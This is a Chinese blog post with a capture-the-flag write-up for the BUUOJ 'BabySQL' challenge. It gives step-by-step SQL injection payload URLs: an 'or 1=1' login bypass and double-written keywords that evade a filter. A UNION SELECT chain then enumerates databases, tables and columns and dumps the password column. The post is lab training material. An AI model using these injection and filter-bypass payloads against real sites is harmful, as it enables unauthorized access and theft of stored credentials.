[极客大挑战 2019]BabySQL

常规sql注入题，尝试使用万能密码进行登陆

http://115b19cd-bb0f-4a8e-8dcb-c520d8553667.node3.buuoj.cn/check.php?username=admin%27 or 1=1%23&password=admin

貌似or关键字被过滤，尝试使用双写进行绕过

http://115b19cd-bb0f-4a8e-8dcb-c520d8553667.node3.buuoj.cn/check.php?username=admin%27 oorr 1=1%23&password=admin

双写就能绕过了？

查询数据库：

http://115b19cd-bb0f-4a8e-8dcb-c520d8553667.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23

查询表：

http://115b19cd-bb0f-4a8e-8dcb-c520d8553667.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23

查询字段：

http://115b19cd-bb0f-4a8e-8dcb-c520d8553667.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23

查询数据：

http://115b19cd-bb0f-4a8e-8dcb-c520d8553667.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23

得到flag

posted @ 2020-07-02 10:32 GTX690M 阅读(225) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

GTX690M

[极客大挑战 2019]BabySQL

公告